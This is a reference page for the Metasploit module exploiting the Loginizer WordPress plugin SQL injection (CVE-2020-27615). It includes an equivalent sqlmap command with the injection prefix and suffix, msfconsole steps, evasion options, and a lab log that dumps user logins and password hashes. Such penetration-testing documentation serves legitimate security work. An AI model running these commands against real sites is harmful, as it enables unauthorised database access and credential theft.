WordPress Loginizer log SQLi Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/wp_loginizer_log_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress Loginizer log SQLi Scanner
Module: auxiliary/scanner/http/wp_loginizer_log_sqli
Source code: modules/auxiliary/scanner/http/wp_loginizer_log_sqli.rb
Disclosure date: 2020-10-21
Last modification time: 2021-12-14 16:40:52 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-27615

Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in versions before 1.6.4. The vulnerable parameter is in the log parameter. Wordpress has forced updates of the plugin to all servers

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/wp_loginizer_log_sqli
msf auxiliary(wp_loginizer_log_sqli) > show options
    ... show and set options ...
msf auxiliary(wp_loginizer_log_sqli) > set RHOSTS ip-range
msf auxiliary(wp_loginizer_log_sqli) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(wp_loginizer_log_sqli) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(wp_loginizer_log_sqli) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(wp_loginizer_log_sqli) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in versions before 1.6.4. The vulnerable parameter is in the log parameter.

Exploitation requires Wordpress after a87271af60113d46ab3866b1e525a1817bce742d

  • 5.4 or newer
  • 5.5 or newer

Attempts to exploit non-vulnerable versions will likely cause loginizer's blacklist to ban the metasploit IP.

Wordpress has forced updates of the plugin to all servers. To test this exploit, the server must not have a connection to the internet.

All versions can be downloaded from wordress.org or 1.6.3

This module slightly replicates sqlmap running as:

python3 sqlmap.py -u http://local.target/wp-login.php --method='POST' --data='log=&pwd=password&wp-submit=Log+In&redirect_to=&testcookie=1' -p log --prefix="', ip = LEFT(UUID(), 8), url = ( TRUE " --suffix=") -- wpdeeply" --dbms mysql --technique=T --time-sec=1 --current-db

Verification Steps


  1. Disconnect the server from the internet
  2. Install the plugin on wordpress
  3. Start msfconsole
  4. Do: use auxiliary/scanner/http/wp_loginizer_log_sqli
  5. Do: set action [action]
  6. Do: run

Options


ACTION: List Users

This action lists COUNT users and password hashes.

COUNT

If Action List Users is selected (default), this is the number of users to enumerate. The larger this list, the more time it will take. Defaults to 1.

Scenarios


Wordpress 5.4.2 with Loginizer 1.6.3 on Ubuntu 20.04 using MariaDB 10.3.22

List Users


resource (loginizer.rb)> use auxiliary/scanner/http/wp_loginizer_log_sqli
resource (loginizer.rb)> set verbose true
verbose => true
resource (loginizer.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > set count 3
count => 3
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > run

[*] Checking /wp-content/plugins/loginizer/readme.txt
[*] Found version 1.6.3 in the plugin
[+] Vulnerable version detected
[*] {SQLi} Executing (select group_concat(XMjgCKOLn) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) XMjgCKOLn from wp_users limit 3) ZtmrJNCuJ)
[*] {SQLi} Time-based injection: expecting output of length 124
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
 admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
 editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/wp_loginizer_log_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/wp_loginizer_log_sqli

msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > show info

       Name: WordPress Loginizer log SQLi Scanner
     Module: auxiliary/scanner/http/wp_loginizer_log_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-10-21

Provided by:
  h00die
  red0xff
  mslavco

Available actions:
  Name        Description
  ----        -----------
  List Users  Queries username, password hash for COUNT users

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COUNT      1                no        Number of users to enumerate
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  Loginizer wordpress plugin contains an unauthenticated timebased SQL 
  injection in versions before 1.6.4. The vulnerable parameter is in 
  the log parameter. Wordpress has forced updates of the plugin to all 
  servers

References:
  https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/
  https://nvd.nist.gov/vuln/detail/CVE-2020-27615
  https://loginizer.com/blog/loginizer-1-6-4-security-fix/
  https://twitter.com/mslavco/status/1318877097184604161

Module Options


This is a complete list of options available in the scanner/http/wp_loginizer_log_sqli auxiliary module:

msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > show options

Module options (auxiliary/scanner/http/wp_loginizer_log_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      1                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/wp_loginizer_log_sqli auxiliary module:

msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > show advanced

Module advanced options (auxiliary/scanner/http/wp_loginizer_log_sqli):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   SqliDelay             1.0                                                 no        The delay to sleep on time-based blind SQL injections
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module
   WPCHECK               true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                                          yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/wp_loginizer_log_sqli module can do:

msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > show actions

Auxiliary actions:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/wp_loginizer_log_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Server not online or not detected as wordpress


Here is a relevant code snippet related to the "Server not online or not detected as wordpress" error message:

43:	    ]
44:	  end
45:	
46:	  def run_host(ip)
47:	    unless wordpress_and_online?
48:	      vprint_error('Server not online or not detected as wordpress')
49:	      return
50:	    end
51:	
52:	    wp_ver = wordpress_version
53:	    if wp_ver.nil?

Unable to determine wordpress version, check settings.


Here is a relevant code snippet related to the "Unable to determine wordpress version, check settings." error message:

49:	      return
50:	    end
51:	
52:	    wp_ver = wordpress_version
53:	    if wp_ver.nil?
54:	      vprint_error('Unable to determine wordpress version, check settings.')
55:	      return
56:	    end
57:	
58:	    if Rex::Version.new(wp_ver) < Rex::Version.new('5.4')
59:	      vprint_error("Wordpress (core) #{wp_ver} is unexploitable.  Version 5.4+ required.")

Wordpress (core) <WP_VER> is unexploitable. Version 5.4+ required.


Here is a relevant code snippet related to the "Wordpress (core) <WP_VER> is unexploitable. Version 5.4+ required." error message:

54:	      vprint_error('Unable to determine wordpress version, check settings.')
55:	      return
56:	    end
57:	
58:	    if Rex::Version.new(wp_ver) < Rex::Version.new('5.4')
59:	      vprint_error("Wordpress (core) #{wp_ver} is unexploitable.  Version 5.4+ required.")
60:	      return
61:	    end
62:	
63:	    checkcode = check_plugin_version_from_readme('loginizer', '1.6.4')
64:	    if checkcode == Msf::Exploit::CheckCode::Safe

Loginizer version not vulnerable


Here is a relevant code snippet related to the "Loginizer version not vulnerable" error message:

60:	      return
61:	    end
62:	
63:	    checkcode = check_plugin_version_from_readme('loginizer', '1.6.4')
64:	    if checkcode == Msf::Exploit::CheckCode::Safe
65:	      vprint_error('Loginizer version not vulnerable')
66:	      return
67:	    else
68:	      print_good('Vulnerable version detected')
69:	    end
70:	

Here is a relevant code snippet related to the "Unable to retrieve wordpress cookie, check settings." error message:

71:	    cookie = send_request_cgi({
72:	      'method' => 'GET',
73:	      'uri' => normalize_uri(target_uri.path, 'wp-login.php')
74:	    })
75:	    if cookie.nil?
76:	      print_error('Unable to retrieve wordpress cookie, check settings.')
77:	      return
78:	    end
79:	    cookie = cookie.get_cookies
80:	    password = Rex::Text.rand_text_alpha(10)
81:	

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

94:	          'wp-submit' => 'Login',
95:	          'redirect_to' => '',
96:	          'testcookie' => '1'
97:	        }
98:	      })
99:	      fail_with Failure::Unreachable, 'Connection failed' unless res
100:	    end
101:	    unless @sqli.test_vulnerable
102:	      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
103:	      return
104:	    end

<PEER> - Testing of SQLi failed. If this is time based, try increasing SqliDelay.


Here is a relevant code snippet related to the "<PEER> - Testing of SQLi failed. If this is time based, try increasing SqliDelay." error message:

97:	        }
98:	      })
99:	      fail_with Failure::Unreachable, 'Connection failed' unless res
100:	    end
101:	    unless @sqli.test_vulnerable
102:	      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
103:	      return
104:	    end
105:	
106:	    columns = ['user_login', 'user_pass']
107:	    results = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • h00die
  • red0xff
  • mslavco

Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.